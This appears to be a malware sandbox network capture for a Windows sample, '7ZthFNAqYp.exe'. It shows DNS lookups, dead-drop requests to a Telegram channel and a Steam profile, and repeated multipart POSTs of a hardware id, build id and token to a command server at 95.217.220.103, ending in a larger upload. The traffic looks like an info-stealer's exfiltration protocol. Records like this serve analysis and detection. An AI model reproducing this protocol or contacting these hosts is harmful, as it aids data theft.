                                                                                                                                                                                                            Oct 23, 2024 07:03:56.920758009 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.920783997 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.920803070 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.930134058 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.930157900 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.930233955 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.930248022 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.930366993 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.935643911 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.935662031 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.935753107 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.935766935 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.935827971 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.943639994 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.943658113 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.943732023 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.943747044 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.943798065 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.951263905 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.951280117 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.951347113 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.951359987 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.951421976 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956180096 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956198931 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956253052 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956267118 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956294060 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.956332922 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963217974 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963238001 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963295937 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963330030 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963359118 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.963380098 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969050884 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969067097 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969119072 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969132900 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969163895 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.969186068 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.975986004 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.976003885 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.976089001 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.976103067 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.976155043 CEST50007443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:56.981352091 CEST4435000795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.819928885 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.821713924 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.821727991 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473726988 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473906040 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473937035 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.474100113 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.491409063 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.491453886 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039166927 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039263010 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039355993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039628983 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039654970 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926043987 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926275969 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926624060 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926655054 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928323984 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928337097 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928437948 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928466082 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928508043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928539991 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928630114 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928673983 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928692102 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928706884 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928843975 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928894043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928894043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928988934 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.929122925 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.929160118 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591176033 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591397047 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591417074 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591567993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591567993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639082909 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639120102 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639200926 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639471054 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639487028 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.902203083 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.902276039 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.550564051 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.550843000 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.560693026 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.560702085 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.562212944 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.562217951 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277369976 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277451038 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277467012 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277510881 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277545929 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277595997 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277715921 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277733088 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279551983 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279647112 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279869080 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.280143976 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.280179977 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.179578066 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.179771900 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.180248976 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.180277109 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.181998968 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.182012081 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876641989 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876753092 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876773119 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876836061 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876936913 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876979113 CEST4435001495.217.220.103192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 07:02:57.185329914 CEST | 60330 | 53 | 192.168.2.6 | 1.1.1.1
Oct 23, 2024 07:02:57.458802938 CEST | 53 | 60330 | 1.1.1.1 | 192.168.2.6
Oct 23, 2024 07:03:07.295788050 CEST | 55170 | 53 | 192.168.2.6 | 1.1.1.1
Oct 23, 2024 07:03:07.304579973 CEST | 53 | 55170 | 1.1.1.1 | 192.168.2.6
Oct 23, 2024 07:04:09.892918110 CEST | 52806 | 53 | 192.168.2.6 | 1.1.1.1
Oct 23, 2024 07:04:09.903908968 CEST | 53 | 52806 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 07:02:57.185329914 CEST | 192.168.2.6 | 1.1.1.1 | 0x49de | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Oct 23, 2024 07:03:07.295788050 CEST | 192.168.2.6 | 1.1.1.1 | 0x8b9b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 07:04:09.892918110 CEST | 192.168.2.6 | 1.1.1.1 | 0xaefe | Standard query (0) | cowod.hopto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 07:02:57.458802938 CEST | 1.1.1.1 | 192.168.2.6 | 0x49de | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 07:03:07.304579973 CEST | 1.1.1.1 | 192.168.2.6 | 0x8b9b | No error (0) | steamcommunity.com |  | 23.192.247.89 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                                                            • t.me
                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • 95.217.220.103
                                                                                                                                                                                                            • 107.191.36.218

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49951 | 107.191.36.218 | 80 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:02:58.794605017 CEST | 89 | OUT | GET / HTTP/1.1
Host: 107.191.36.218
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49940 | 149.154.167.99 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:02:58 UTC | 92 | OUT | GET /fun88rockskek HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:02:58 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 23 Oct 2024 05:02:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12425
Connection: close
Set-Cookie: stel_ssid=6a9de2bc16c71e870e_3526692613400229604; expires=Thu, 24 Oct 2024 05:02:58 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
2024-10-23 05:02:58 UTC | 12425 | IN
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fun88rockskek</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49988 | 23.192.247.89 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:08 UTC | 119 | OUT | GET /profiles/76561199786602107 HTTP/1.1
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:08 UTC | 1891 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:08 GMT
                                                                                                                                                                                                            Content-Length: 34570
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=0ef2af96d68a2b9373012721; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=None
2024-10-23 05:03:08 UTC | 14493 | IN
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-23 05:03:08 UTC | 10083 | IN
                                                                                                                                                                                                            Data Ascii: tipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global
2024-10-23 05:03:08 UTC | 9994 | IN
                                                                                                                                                                                                            Data Ascii: static.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49989 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:10 UTC | 187 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:10 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
2024-10-23 05:03:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49990 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:11 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 255
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:11 UTC | 255 | OUT
                                                                                                                                                                                                            Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="hwid"CBE6B77731CC661179348-a33c7340-61ca------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------KEGDAKEHJDHIDHJJDAEC--
2024-10-23 05:03:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:12 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
2024-10-23 05:03:12 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|5e45ddb13e4a06bfe6b26a941e17b348|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49991 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:13 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:13 UTC | 331 | OUT
                                                                                                                                                                                                            Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------KEGDAKEHJDHIDHJJDAECCont
2024-10-23 05:03:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:14 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
2024-10-23 05:03:14 UTC | 1564 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49992 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:15 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------DGDAEHCBGIIJJJJKKKEHCont
                                                                                                                                                                                                            2024-10-23 05:03:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:15 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49993        95.217.220.103  443               6484  C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-23 05:03:16 UTC  279                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:16 UTC  332                OUT        Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFCBFBGDBKJKECAAKKFHCont
2024-10-23 05:03:17 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49994        95.217.220.103  443               6484  C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-23 05:03:18 UTC  280                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 5461
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:18 UTC  5461               OUT        Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFIEHCFIECBGCBFHIJJKCont
2024-10-23 05:03:39 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 05:03:39 UTC  12                 IN         Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
